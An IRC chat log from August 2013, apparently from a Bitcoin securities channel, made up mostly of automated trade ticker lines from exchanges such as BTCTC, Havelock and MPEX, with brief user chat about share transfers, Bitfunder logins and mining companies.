[BTCTC] [DMS.SELLING] 54 @ 0.01837 = 0.992 BTC [+] Aug 15 05:28:37 [HAVELOCK] [XBOND] 161 @ 0.00105 = 0.1691 BTC [+] Aug 15 05:28:40 [HAVELOCK] [XBOND] 492 @ 0.00105 = 0.5166 BTC [+] Aug 15 05:29:40 [BTCTC] [LABCOIN] 642 @ 0.001675 = 1.0754 BTC [+] Aug 15 05:30:03 [BTCTC] [LABCOIN] 100 @ 0.001651 = 0.1651 BTC [-] Aug 15 05:31:23 [BTCTC] [LABCOIN] 135 @ 0.001651 = 0.2229 BTC [-] Aug 15 05:31:24 [BTCTC] [LABCOIN] 100 @ 0.00165 = 0.165 BTC [-] Aug 15 05:32:49 [HAVELOCK] [XBOND] 3 @ 0.0010499 = 0.0031 BTC [-] Aug 15 05:33:19 ok you fucking bird, I've spent my chocolate bar Aug 15 05:33:25 prepare to die Aug 15 05:34:26 fuck Aug 15 05:34:44 [BTCTC] [LABCOIN] 235 @ 0.001661 = 0.3903 BTC [+] Aug 15 05:36:01 sword of life looks like some kind of fleshlight Aug 15 05:37:57 [BTCTC] [LABCOIN] 235 @ 0.001662 = 0.3906 BTC [+] Aug 15 05:38:27 [BTCTC] [LABCOIN] 235 @ 0.001661 = 0.3903 BTC [-] Aug 15 05:38:48 [HAVELOCK] [AM100] 38 @ 0.0389106 = 1.4786 BTC [+] Aug 15 05:38:57 [BTCTC] [LABCOIN] 235 @ 0.001662 = 0.3906 BTC [+] Aug 15 05:39:27 [BTCTC] [LABCOIN] 20 @ 0.001662 = 0.0332 BTC [+] Aug 15 05:39:28 [BTCTC] [LABCOIN] 235 @ 0.001661 = 0.3903 BTC [-] Aug 15 05:39:56 [BTCTC] [LABCOIN] 235 @ 0.001662 = 0.3906 BTC [+] Aug 15 05:40:29 [BTCTC] [LABCOIN] 235 @ 0.001661 = 0.3903 BTC [-] Aug 15 05:41:11 [BTCTC] [LABCOIN] 1 @ 0.00166 BTC [-] Aug 15 05:42:00 [BTCTC] [LABCOIN] 235 @ 0.001652 = 0.3882 BTC [-] Aug 15 05:42:01 [BTCTC] [LABCOIN] 143 @ 0.001652 = 0.2362 BTC [-] Aug 15 05:42:47 [BTCTC] [LABCOIN] 92 @ 0.001652 = 0.152 BTC [-] Aug 15 05:42:48 [BTCTC] [LABCOIN] 143 @ 0.001652 = 0.2362 BTC [-] Aug 15 05:42:50 [BTCTC] [LABCOIN] 235 @ 0.001651 = 0.388 BTC [-] Aug 15 05:43:08 [BTCTC] [LABCOIN] 143 @ 0.00165 = 0.236 BTC [-] Aug 15 05:44:42 [BTCTC] [DMS.SELLING] 100 @ 0.01834 = 1.834 BTC [-] Aug 15 05:46:01 [BTCTC] [DMS.SELLING] 23 @ 0.01834 = 0.4218 BTC [-] Aug 15 05:47:00 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001228 = 0.0037 BTC [-] Aug 15 05:47:14 [HAVELOCK] [XBOND] 1 @ 0.0010499 BTC [-] Aug 15 05:47:57 [BTCTC] [DMS.SELLING] 250 @ 0.01834 = 4.585 BTC [-] Aug 15 05:50:12 [BTCTC] [DMS.PURCHASE] 3 @ 0.02079 = 0.0624 BTC [+] Aug 15 05:50:34 [BTCTC] [COG.F2] 3 @ 5 = 15 BTC [-] Aug 15 05:50:45 [BTCTC] [LABCOIN] 235 @ 0.00166 = 0.3901 BTC [+] Aug 15 05:50:46 [BTCTC] [TAT.ASICMINER] 11 @ 0.03999 = 0.4399 BTC [-] Aug 15 05:50:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.03993 = 0.0799 BTC [-] Aug 15 05:50:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.03912 = 0.0782 BTC [-] Aug 15 05:50:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.03909 BTC [-] Aug 15 05:50:52 [BTCTC] [TAT.ASICMINER] 11 @ 0.03904 = 0.4294 BTC [-] Aug 15 05:50:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.03902 = 0.1171 BTC [-] Aug 15 05:50:54 [BTCTC] [TAT.ASICMINER] 50 @ 0.03901 = 1.9505 BTC [-] Aug 15 05:50:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.03901 = 0.3901 BTC [-] Aug 15 05:50:56 [BTCTC] [COG.F2] 1 @ 5 BTC [-] Aug 15 05:51:35 [BTCTC] [LABCOIN] 235 @ 0.001659 = 0.3899 BTC [-] Aug 15 05:51:36 [BTCTC] [LABCOIN] 20 @ 0.001636 = 0.0327 BTC [-] Aug 15 05:51:39 [BTCTC] [ASICMINER-PT] 1 @ 3.94 BTC [-] Aug 15 05:51:40 [BTCTC] [ASICMINER-PT] 1 @ 3.94 BTC [-] Aug 15 05:51:42 [BTCTC] [ASICMINER-PT] 1 @ 3.998 BTC [+] Aug 15 05:54:31 [HAVELOCK] [XBOND] 49 @ 0.0010499 = 0.0514 BTC [-] Aug 15 05:56:55 [BTCTC] [DMS.MINING] 15 @ 0.002799 = 0.042 BTC [+] Aug 15 05:57:21 [BTCTC] [ACTIVEMINING] 5 @ 0.005318 = 0.0266 BTC [+] Aug 15 05:58:38 [BTCTC] [DMS.SELLING] 200 @ 0.0182 = 3.64 BTC [-] Aug 15 05:58:49 [BTCTC] [LABCOIN] 235 @ 0.001651 = 0.388 BTC [+] Aug 15 05:59:08 [HAVELOCK] [XBOND] 20 @ 0.0010499 = 0.021 BTC [-] Aug 15 05:59:30 [HAVELOCK] [XBOND] 1 @ 0.0010487 BTC [-] Aug 15 05:59:59 [BTCTC] [DMS.SELLING] 6 @ 0.01811 = 0.1087 BTC [-] Aug 15 06:00:01 [BTCTC] [DMS.SELLING] 13 @ 0.01811 = 0.2354 BTC [-] Aug 15 06:00:27 [BTCTC] [LABCOIN] 11 @ 0.001654 = 0.0182 BTC [+] Aug 15 06:00:29 [BTCTC] [LABCOIN] 185 @ 0.001655 = 0.3062 BTC [+] Aug 15 06:00:47 [BTCTC] [LABCOIN] 235 @ 0.001651 = 0.388 BTC [-] Aug 15 06:00:49 [BTCTC] [LABCOIN] 235 @ 0.00165 = 0.3878 BTC [-] Aug 15 06:01:32 [BTCTC] [ACTIVEMINING] 30 @ 0.005314 = 0.1594 BTC [-] Aug 15 06:01:33 [BTCTC] [ACTIVEMINING] 3 @ 0.005315 = 0.0159 BTC [+] Aug 15 06:01:51 [BTCTC] [DMS.SELLING] 66 @ 0.0182 = 1.2012 BTC [+] Aug 15 06:02:44 [BTCTC] [ACTIVEMINING] 30 @ 0.005444 = 0.1633 BTC [+] Aug 15 06:02:44 [BTCTC] [ACTIVEMINING] 26 @ 0.005445 = 0.1416 BTC [+] Aug 15 06:04:05 [BTCTC] [LABCOIN] 20 @ 0.001652 = 0.033 BTC [+] Aug 15 06:07:43 [BTCTC] [DMS.PURCHASE] 320 @ 0.02079 = 6.6528 BTC [+] Aug 15 06:09:34 [BTCTC] [DMS.MINING] 100 @ 0.00271 = 0.271 BTC [-] Aug 15 06:10:05 [BTCTC] [DMS.SELLING] 34 @ 0.0182 = 0.6188 BTC [+] Aug 15 06:10:14 [BTCTC] [BITVPS] 237 @ 0.002699 = 0.6397 BTC [+] Aug 15 06:10:15 [BTCTC] [BITVPS] 100 @ 0.0027 = 0.27 BTC [+] Aug 15 06:11:08 [BTCTC] [DMS.SELLING] 27 @ 0.01834 = 0.4952 BTC [+] Aug 15 06:12:44 [BTCTC] [DMS.MINING] 120 @ 0.002703 = 0.3244 BTC [-] Aug 15 06:12:57 [BTCTC] [ACTIVEMINING] 30 @ 0.005252 = 0.1576 BTC [-] Aug 15 06:12:58 [BTCTC] [BITVPS] 13 @ 0.002779 = 0.0361 BTC [+] Aug 15 06:13:00 [BTCTC] [ACTIVEMINING] 68 @ 0.005251 = 0.3571 BTC [-] Aug 15 06:13:00 [BTCTC] [ACTIVEMINING] 13 @ 0.00525 = 0.0683 BTC [-] Aug 15 06:13:12 [BTCTC] [ACTIVEMINING] 4 @ 0.005244 = 0.021 BTC [-] Aug 15 06:13:41 [MPEX] [S.MPOE] 6923 @ 0.00084877 = 5.876 BTC [+] Aug 15 06:13:43 [MPEX] [S.MPOE] 2150 @ 0.00085178 = 1.8313 BTC [+] Aug 15 06:13:55 [MPEX] [S.MPOE] 3495 @ 0.00085252 = 2.9796 BTC [+] Aug 15 06:13:57 [BTCTC] [BITVPS] 181 @ 0.002779 = 0.503 BTC [+] Aug 15 06:13:59 [BTCTC] [BITVPS] 40 @ 0.00278 = 0.1112 BTC [+] Aug 15 06:14:43 [HAVELOCK] [XBOND] 4 @ 0.0010463 = 0.0042 BTC [-] Aug 15 06:15:18 [BTCTC] [DMS.MINING] 6 @ 0.00275 = 0.0165 BTC [+] Aug 15 06:16:31 [BTCTC] [ASICMINER-PT] 1 @ 3.94 BTC [-] Aug 15 06:16:34 [BTCTC] [ASICMINER-PT] 1 @ 3.933 BTC [-] Aug 15 06:16:35 [BTCTC] [ASICMINER-PT] 1 @ 3.932 BTC [-] Aug 15 06:16:36 [BTCTC] [ASICMINER-PT] 1 @ 3.932 BTC [-] Aug 15 06:16:37 [BTCTC] [ASICMINER-PT] 1 @ 3.915 BTC [-] Aug 15 06:16:38 [BTCTC] [ASICMINER-PT] 7 @ 3.914 = 27.398 BTC [-] Aug 15 06:16:40 [BTCTC] [ASICMINER-PT] 3 @ 3.914 = 11.742 BTC [-] Aug 15 06:16:41 [BTCTC] [ASICMINER-PT] 4 @ 3.913 = 15.652 BTC [-] Aug 15 06:16:42 [BTCTC] [ASICMINER-PT] 10 @ 3.912 = 39.12 BTC [-] Aug 15 06:16:43 [BTCTC] [ASICMINER-PT] 20 @ 3.911 = 78.22 BTC [-] Aug 15 06:16:44 [BTCTC] [ASICMINER-PT] 2 @ 3.903 = 7.806 BTC [-] Aug 15 06:16:45 [BTCTC] [ASICMINER-PT] 50 @ 3.902 = 195.1 BTC [-] Aug 15 06:18:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.03996 = 0.0799 BTC [+] Aug 15 06:18:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.03905 = 0.4296 BTC [-] Aug 15 06:19:43 [BTCTC] [DMS.MINING] 100 @ 0.002707 = 0.2707 BTC [-] Aug 15 06:19:45 [BTCTC] [DMS.MINING] 80 @ 0.002703 = 0.2162 BTC [-] Aug 15 06:19:46 [BTCTC] [DMS.MINING] 54 @ 0.002701 = 0.1459 BTC [-] Aug 15 06:19:47 [BTCTC] [DMS.MINING] 17 @ 0.002701 = 0.0459 BTC [-] Aug 15 06:19:48 [BTCTC] [DMS.MINING] 10 @ 0.002701 = 0.027 BTC [-] Aug 15 06:19:49 [BTCTC] [DMS.MINING] 594 @ 0.0027 = 1.6038 BTC [-] Aug 15 06:19:51 [BTCTC] [DMS.MINING] 780 @ 0.00266 = 2.0748 BTC [-] Aug 15 06:19:52 [BTCTC] [DMS.MINING] 100 @ 0.002653 = 0.2653 BTC [-] Aug 15 06:20:46 [BTCTC] [BITVPS] 60 @ 0.00278 = 0.1668 BTC [+] Aug 15 06:20:47 [BTCTC] [BITVPS] 100 @ 0.0028 = 0.28 BTC [+] Aug 15 06:20:58 [BTCTC] [BITVPS] 10 @ 0.003 = 0.03 BTC [+] Aug 15 06:20:59 [BTCTC] [BITVPS] 100 @ 0.003 = 0.3 BTC [+] Aug 15 06:21:00 [BTCTC] [BITVPS] 100 @ 0.0032 = 0.32 BTC [+] Aug 15 06:21:07 [BTCTC] [BITVPS] 50 @ 0.00329 = 0.1645 BTC [+] Aug 15 06:21:08 [BTCTC] [BITVPS] 140 @ 0.00339 = 0.4746 BTC [+] Aug 15 06:21:09 [BTCTC] [BITVPS] 232 @ 0.00339 = 0.7865 BTC [+] Aug 15 06:21:11 [BTCTC] [BITVPS] 558 @ 0.003399 = 1.8966 BTC [+] **** BEGIN LOGGING AT Thu Aug 15 13:16:21 2013 Aug 15 13:16:50 [BTCTC] [BTC-TRADING-PT] 5 @ 0.7459 = 3.7295 BTC [+] Aug 15 13:16:54 hmm really would like to get this bitfunder email, realy tired and trying to get put the purchase order in now. Aug 15 13:16:59 ;;later tell dexx7 he was for about a month, but didn't do too much so i let it drop. Aug 15 13:16:59 The operation succeeded. Aug 15 13:17:47 [BTCTC] [TAT.ASICMINER] 40 @ 0.04025 = 1.61 BTC [-] Aug 15 13:17:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.03986 = 0.0797 BTC [-] Aug 15 13:17:49 [BTCTC] [TAT.ASICMINER] 31 @ 0.03986 = 1.2357 BTC [-] Aug 15 13:17:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.03985 = 0.1594 BTC [-] Aug 15 13:17:51 [BTCTC] [TAT.ASICMINER] 15 @ 0.03985 = 0.5978 BTC [-] Aug 15 13:17:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.03985 = 0.0797 BTC [-] Aug 15 13:17:54 [BTCTC] [TAT.ASICMINER] 6 @ 0.03984 = 0.239 BTC [-] Aug 15 13:17:59 [BTCTC] [ASICMINER-PT] 1 @ 3.953 BTC [-] Aug 15 13:18:06 As I cannot log into bitfunder yet, anyone know if you can easily transfer shares to someone instantly? I would assume u could. Aug 15 13:18:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.04037 = 0.1615 BTC [+] Aug 15 13:19:34 [BTCTC] [TAT.ASICMINER] 13 @ 0.04038 = 0.5249 BTC [+] Aug 15 13:21:35 [BTCTC] [TAT.ASICMINER] 9 @ 0.04038 = 0.3634 BTC [+] Aug 15 13:22:28 if youre logged in, yes Aug 15 13:22:55 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 15 13:23:24 okay Aug 15 13:23:31 still waiting sadly on the emails haha Aug 15 13:25:21 try messaging ukyo on #bitfunder channel Aug 15 13:26:17 u think he would be on at this time? Aug 15 13:26:45 hes not online i just checked Aug 15 13:27:18 not in new or spam folder, oh well hopefully the shares i want wont spike by time i wake up. Aug 15 13:27:42 [MPEX] [S.MPOE] 9500 @ 0.00085433 = 8.1161 BTC [+] Aug 15 13:27:44 [MPEX] [S.MPOE] 200 @ 0.00085423 = 0.1708 BTC [-] Aug 15 13:27:44 only putting 10 BTC in, but still haha. Aug 15 13:27:44 [MPEX] [S.MPOE] 31750 @ 0.0008518 = 27.0447 BTC [-] Aug 15 13:27:46 [MPEX] [S.MPOE] 13000 @ 0.00084802 = 11.0243 BTC [-] Aug 15 13:27:48 [BTCTC] [DMS.MINING] 37 @ 0.002785 = 0.103 BTC [-] Aug 15 13:28:03 [BTCTC] [LABCOIN] 235 @ 0.001788 = 0.4202 BTC [-] Aug 15 13:30:28 ukto is ukyo, dont know if he is looking at the chat tho Aug 15 13:32:00 [BTCTC] [TAT.MINIGAME] 4 @ 0.00021 = 0.0008 BTC [-] Aug 15 13:32:14 what is MINIGAME? Aug 15 13:32:19 never heard of that stock before Aug 15 13:32:44 PT to S.MG. http://trilema.com/category/smg/ Aug 15 13:34:03 [BTCTC] [DMS.MINING] 4 @ 0.0028 = 0.0112 BTC [+] Aug 15 13:34:29 So mircea what is your opinion of the ICEasic company? taking 25% of basically what anyone could mine themselves if they bought a 5k machine. Difficulty in my opinion is too hard to truly predict right now, too many companies all gunning it all for the fastest mining equipment. Aug 15 13:35:00 you read the girl's post on rational investment and commodified markets ? Aug 15 13:35:01 Also, thank you for that link I will read into it, Aug 15 13:35:16 Uh honestly no. Aug 15 13:35:23 [BTCTC] [LABCOIN] 235 @ 0.001735 = 0.4077 BTC [-] Aug 15 13:35:29 ok hang on i'll get it for you. Aug 15 13:35:37 Okay Aug 15 13:39:40 [BTCTC] [LABCOIN] 235 @ 0.001735 = 0.4077 BTC [-] Aug 15 13:39:57 [BTCTC] [TAT.ASICMINER] 35 @ 0.04037 = 1.413 BTC [-] Aug 15 13:44:35 No luck finding it? Aug 15 13:45:42 [HAVELOCK] [LABCO] 8 @ 0.00179995 = 0.0144 BTC [+] Aug 15 13:47:15 [HAVELOCK] [XBOND] 628 @ 0.0010435 = 0.6553 BTC [-] Aug 15 13:47:18 [HAVELOCK] [XBOND] 372 @ 0.0010434 = 0.3881 BTC [-] Aug 15 13:49:29 [HAVELOCK] [XBOND] 25 @ 0.0010447 = 0.0261 BTC [+] Aug 15 13:49:31 ;;later tell kingofsports https://bitcointalk.org/index.php?topic=201268.msg2121475#msg2121475 Aug 15 13:49:31 The operation succeeded. Aug 15 13:49:43 jezuz kids today. so impacient. Aug 15 13:50:45 [BTCTC] [ACTIVEMINING] 7 @ 0.005405 = 0.0378 BTC [+] Aug 15 13:51:47 [BTCTC] [LABCOIN] 235 @ 0.001678 = 0.3943 BTC [-] Aug 15 13:51:48 [BTCTC] [LABCOIN] 29 @ 0.001677 = 0.0486 BTC [-] Aug 15 13:51:49 [BTCTC] [LABCOIN] 2 @ 0.001675 = 0.0034 BTC [-] Aug 15 13:51:50 [BTCTC] [LABCOIN] 20 @ 0.001674 = 0.0335 BTC [-] Aug 15 13:51:52 [BTCTC] [LABCOIN] 16 @ 0.001654 = 0.0265 BTC [-] Aug 15 13:51:53 [BTCTC] [LABCOIN] 98 @ 0.001653 = 0.162 BTC [-] Aug 15 13:52:39 [BTCTC] [LABCOIN] 4 @ 0.001654 = 0.0066 BTC [+] Aug 15 13:52:41 [BTCTC] [LABCOIN] 32 @ 0.001653 = 0.0529 BTC [-] Aug 15 13:53:20 [BTCTC] [DMS.SELLING] 11 @ 0.01801 = 0.1981 BTC [+] Aug 15 13:54:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.04038 = 0.1211 BTC [+] Aug 15 13:54:31 [BTCTC] [DMS.SELLING] 14 @ 0.0182 = 0.2548 BTC [+] Aug 15 13:54:55 [BTCTC] [DMS.MINING] 8 @ 0.0028 = 0.0224 BTC [+] Aug 15 13:55:05 ;;ticker Aug 15 13:55:05 MtGox BTCUSD ticker | Best bid: 110.71512, Best ask: 111.34187, Bid-ask spread: 0.62675, Last trade: 110.71000, 24 hour volume: 30282.34745714, 24 hour low: 110.50000, 24 hour high: 115.00000, 24 hour vwap: 112.91682 Aug 15 13:55:37 [BTCTC] [DMS.SELLING] 27 @ 0.01785 = 0.482 BTC [-] Aug 15 13:56:43 [BTCTC] [DMS.SELLING] 14 @ 0.01785 = 0.2499 BTC [-] Aug 15 13:57:35 [BTCTC] [LABCOIN] 2 @ 0.001643 = 0.0033 BTC [-] Aug 15 13:57:36 [BTCTC] [LABCOIN] 20 @ 0.001642 = 0.0328 BTC [-] Aug 15 13:57:38 [BTCTC] [LABCOIN] 450 @ 0.001641 = 0.7385 BTC [-] Aug 15 13:58:23 [BTCTC] [TAT.ASICMINER] 22 @ 0.04038 = 0.8884 BTC [+] Aug 15 14:01:39 [BTCTC] [BASIC-MINING] 7 @ 0.31 = 2.17 BTC [+] Aug 15 14:03:08 [HAVELOCK] [XBOND] 2 @ 0.0010447 = 0.0021 BTC [+] Aug 15 14:03:36 [BTCTC] [DMS.SELLING] 3 @ 0.0182 = 0.0546 BTC [+] Aug 15 14:04:24 [BTCTC] [DMS.MINING] 50 @ 0.002788 = 0.1394 BTC [-] Aug 15 14:04:25 [BTCTC] [DMS.MINING] 68 @ 0.0028 = 0.1904 BTC [+] Aug 15 14:04:26 [BTCTC] [DMS.MINING] 200 @ 0.0028 = 0.56 BTC [+] Aug 15 14:15:11 [HAVELOCK] [XBOND] 96 @ 0.0010447 = 0.1003 BTC [+] Aug 15 14:15:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.03988 BTC [-] Aug 15 14:18:34 [BTCTC] [BASIC-MINING] 1 @ 0.31 BTC [+] Aug 15 14:21:04 [BTCTC] [DMS.MINING] 30 @ 0.0028 = 0.084 BTC [+] Aug 15 14:22:14 [BTCTC] [DMS.MINING] 100 @ 0.002825 = 0.2825 BTC [+] Aug 15 14:22:59 [BTCTC] [DMS.MINING] 100 @ 0.00285 = 0.285 BTC [+] Aug 15 14:23:01 [BTCTC] [DMS.MINING] 20 @ 0.00285 = 0.057 BTC [+] Aug 15 14:23:02 [HAVELOCK] [XBOND] 207 @ 0.0010447 = 0.2163 BTC [+] Aug 15 14:23:43 [BTCTC] [DMS.MINING] 50 @ 0.002878 = 0.1439 BTC [+] Aug 15 14:24:28 [BTCTC] [DMS.MINING] 105 @ 0.002899 = 0.3044 BTC [+] Aug 15 14:25:08 [BTCTC] [DMS.MINING] 100 @ 0.0029 = 0.29 BTC [+] Aug 15 14:26:27 [BTCTC] [DMS.MINING] 80 @ 0.00293 = 0.2344 BTC [+] Aug 15 14:27:29 [BTCTC] [W4A-BOOK] 2 @ 0.28 = 0.56 BTC [+] Aug 15 14:27:30 [BTCTC] [W4A-BOOK] 3 @ 0.25 = 0.75 BTC [-] Aug 15 14:31:24 [BTCTC] [LABCOIN] 1 @ 0.001665 BTC [+] Aug 15 14:31:25 [BTCTC] [LABCOIN] 20 @ 0.001666 = 0.0333 BTC [+] Aug 15 14:31:27 [BTCTC] [LABCOIN] 31 @ 0.001749 = 0.0542 BTC [+] Aug 15 14:31:27 [BTCTC] [LABCOIN] 233 @ 0.00175 = 0.4078 BTC [+] Aug 15 14:31:28 [HAVELOCK] [CFIG] 100 @ 0.15 = 15 BTC Aug 15 14:33:27 [BTCTC] [DMS.SELLING] 100 @ 0.01815 = 1.815 BTC [-] Aug 15 14:38:11 [BTCTC] [COGNITIVE] 3 @ 0.3684 = 1.1052 BTC [+] Aug 15 14:38:39 [BTCTC] [DMS.SELLING] 24 @ 0.01815 = 0.4356 BTC [-] Aug 15 14:45:26 [HAVELOCK] [XBOND] 623 @ 0.0010447 = 0.6508 BTC [+] Aug 15 14:46:09 [HAVELOCK] [XBOND] 1 @ 0.0010448 BTC [+] Aug 15 14:46:12 [HAVELOCK] [XBOND] 623 @ 0.0010447 = 0.6508 BTC [-] Aug 15 14:50:01 [HAVELOCK] [XBOND] 622 @ 0.0010498 = 0.653 BTC [+] Aug 15 14:50:10 [HAVELOCK] [XBOND] 311 @ 0.0010498 = 0.3265 BTC [+] Aug 15 14:50:38 [HAVELOCK] [XBOND] 60 @ 0.00104999 = 0.063 BTC [+] Aug 15 14:51:07 [HAVELOCK] [XBOND] 2000 @ 0.00105 = 2.1 BTC [+] Aug 15 14:51:44 [BTCTC] [LABCOIN] 2 @ 0.001651 = 0.0033 BTC [-] Aug 15 14:51:56 [HAVELOCK] [XBOND] 2000 @ 0.00105 = 2.1 BTC [+] Aug 15 14:52:33 [BTCTC] [DMS.PURCHASE] 3 @ 0.02079 = 0.0624 BTC [+] Aug 15 14:53:16 [BTCTC] [LABCOIN] 7 @ 0.001651 = 0.0116 BTC [-] Aug 15 14:53:17 [BTCTC] [LABCOIN] 9 @ 0.001717 = 0.0155 BTC [+] Aug 15 14:53:18 [BTCTC] [LABCOIN] 2 @ 0.00172 = 0.0034 BTC [+] Aug 15 14:53:19 [BTCTC] [LABCOIN] 20 @ 0.001721 = 0.0344 BTC [+] Aug 15 14:53:21 [BTCTC] [LABCOIN] 16 @ 0.001749 = 0.028 BTC [+] Aug 15 14:53:22 [BTCTC] [LABCOIN] 17 @ 0.00175 = 0.0298 BTC [+] Aug 15 14:53:23 [BTCTC] [LABCOIN] 115 @ 0.00175 = 0.2013 BTC [+] Aug 15 14:53:24 [BTCTC] [LABCOIN] 9 @ 0.001759 = 0.0158 BTC [+] Aug 15 14:53:25 [BTCTC] [LABCOIN] 75 @ 0.00176 = 0.132 BTC [+] Aug 15 14:53:26 [BTCTC] [LABCOIN] 437 @ 0.001763 = 0.7704 BTC [+] Aug 15 14:53:26 [BTCTC] [LABCOIN] 2060 @ 0.001764 = 3.6338 BTC [+] Aug 15 14:55:04 [HAVELOCK] [XBOND] 2000 @ 0.00105 = 2.1 BTC [+] Aug 15 14:55:13 [HAVELOCK] [XBOND] 2000 @ 0.00105 = 2.1 BTC [+] Aug 15 14:55:28 [HAVELOCK] [XBOND] 2000 @ 0.00105 = 2.1 BTC [+] Aug 15 14:55:37 [HAVELOCK] [XBOND] 2000 @ 0.00105 = 2.1 BTC [+] Aug 15 14:55:50 [HAVELOCK] [XBOND] 1000 @ 0.00105 = 1.05 BTC [+] Aug 15 14:56:00 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001199 = 0.0048 BTC [+] Aug 15 14:56:05 [HAVELOCK] [XBOND] 500 @ 0.00105 = 0.525 BTC [+] Aug 15 14:56:14 [BTCTC] [NASTY-PT] 3 @ 0.00435 = 0.0131 BTC [-] Aug 15 14:56:15 [HAVELOCK] [XBOND] 50 @ 0.00105 = 0.0525 BTC [+] **** BEGIN LOGGING AT Thu Aug 15 15:01:35 2013 Aug 15 15:01:36 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:01:37 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [-] Aug 15 15:01:38 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 15 15:01:39 [BTCTC] [BTC-GROWTH] 40 @ 0.1 = 4 BTC [-] Aug 15 15:01:40 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:01:41 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [-] Aug 15 15:01:42 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:01:42 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [-] Aug 15 15:01:43 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:01:44 [BTCTC] [BTC-GROWTH] 34 @ 0.1 = 3.4 BTC [-] Aug 15 15:01:45 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:01:47 [BTCTC] [BTC-GROWTH] 235 @ 0.1 = 23.5 BTC [-] Aug 15 15:01:48 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [-] Aug 15 15:01:49 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:01:50 [BTCTC] [BTC-GROWTH] 11 @ 0.1 = 1.1 BTC [-] Aug 15 15:01:51 [BTCTC] [BTC-GROWTH] 500 @ 0.1 = 50 BTC [-] Aug 15 15:01:52 [BTCTC] [BTC-GROWTH] 12 @ 0.1 = 1.2 BTC [-] Aug 15 15:01:53 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [-] Aug 15 15:01:54 [BTCTC] [BTC-GROWTH] 373 @ 0.1 = 37.3 BTC [-] Aug 15 15:01:54 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:01:55 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [-] Aug 15 15:01:56 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 15 15:01:57 [BTCTC] [BTC-GROWTH] 79 @ 0.1 = 7.9 BTC [-] Aug 15 15:01:58 [BTCTC] [BTC-GROWTH] 40 @ 0.1 = 4 BTC [-] Aug 15 15:01:59 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 15 15:02:00 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:02:02 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [-] Aug 15 15:02:03 [BTCTC] [BTC-GROWTH] 11 @ 0.1 = 1.1 BTC [-] Aug 15 15:02:04 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:02:04 [BTCTC] [BTC-GROWTH] 25 @ 0.1 = 2.5 BTC [-] Aug 15 15:02:05 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [-] Aug 15 15:02:06 [BTCTC] [BTC-GROWTH] 125 @ 0.1 = 12.5 BTC [-] Aug 15 15:02:07 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [-] Aug 15 15:02:08 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:02:09 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:02:10 [BTCTC] [BTC-GROWTH] 9 @ 0.1 = 0.9 BTC [-] Aug 15 15:02:11 [BTCTC] [BTC-GROWTH] 80 @ 0.1 = 8 BTC [-] Aug 15 15:02:12 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:02:12 [BTCTC] [BTC-GROWTH] 19 @ 0.1 = 1.9 BTC [-] Aug 15 15:02:13 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [-] Aug 15 15:02:14 [BTCTC] [BTC-GROWTH] 110 @ 0.1 = 11 BTC [-] Aug 15 15:02:15 [BTCTC] [BTC-GROWTH] 200 @ 0.1 = 20 BTC [-] Aug 15 15:02:16 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:02:17 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 15 15:02:18 [BTCTC] [BTC-GROWTH] 14 @ 0.1 = 1.4 BTC [-] Aug 15 15:02:19 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:02:37 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:02:48 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 15 15:03:22 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [-] Aug 15 15:03:22 people are nuts Aug 15 15:03:40 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 15 15:03:42 [MPEX] [S.MPOE] 6402 @ 0.00085498 = 5.4736 BTC 